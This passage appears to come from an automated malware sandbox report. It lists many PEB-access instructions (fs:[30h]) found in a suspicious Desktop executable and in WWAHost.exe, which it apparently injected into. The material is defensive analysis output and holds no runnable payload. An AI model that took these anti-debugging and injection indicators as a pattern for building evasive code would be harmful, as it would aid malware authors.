            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01134F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01134F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01148794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011737F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01168E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01147E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01200EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01178EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011636CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011616E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011476E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0322070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0322070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03154F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03154F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03228F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03183B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03183B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03228B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03168794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03225BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03161B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03161B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0320D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03155210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03155210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03173A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03188E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03168A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0320FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03194A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03194A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0320B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0320B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03228A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03167E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03220EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03198EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0320FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03228ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03159100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03228D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03163D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03184D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03177D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03193D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0317C182 mov eax, dword ptr fs:[00000030h]
